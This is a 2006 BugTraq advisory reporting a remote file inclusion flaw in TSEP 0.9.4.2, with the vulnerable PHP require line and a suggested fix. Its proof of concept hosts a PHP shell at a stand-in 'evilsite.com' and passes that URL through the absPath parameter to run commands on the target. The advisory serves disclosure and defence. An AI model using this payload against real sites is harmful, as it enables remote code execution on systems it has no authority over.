BugTraq
TSEP 0.9.4.2 <= Remote File Inclusion Aug 01 2006 09:18AM
philipp niedziela gmx de
+--------------------------------------------------------------------

+

+ TSEP 0.9.4.2

+

+--------------------------------------------------------------------

+

+ Affected Software .: TSEP 0.9.4.2

+ Venedor ...........: http://www.tsep.info/

+ Class .............: Remote File Inclusion

+ Risk ..............: high (Remote File Execution)

+ Found by ..........: Philipp Niedziela

+ Original advisory .: http://www.bb-pcsecurity.de/

+ Contact ...........: webmaster[at]bb-pcsecurity[.]de

+

+--------------------------------------------------------------------

+

+ Code /include/copyright.php:

+

+ .....

+ <?php require ( $tsep_config["absPath"]."/include/tsepversion.txt" ); ?>

+ .....

+

+--------------------------------------------------------------------

+

+ $tsep_config["absPath"] is not properly sanitized before being used

+

+--------------------------------------------------------------------

+

+ Solution:

+ Include config-File in copyright.php

+

+--------------------------------------------------------------------

+

+ PoC:

+ Place a PHPShell on a remote location:

+ http://evilsite.com/include/tsepversion.txt

+

+ http://[target]/include/copyright.php?tsep_config[absPath]=http://evilsi
te.com?cmd=ls

+

+--------------------------------------------------------------------

+

+ Greets:

+ Krini Gonzales (5 YEARS :P)

+

+-------------------------[ E O F ]----------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus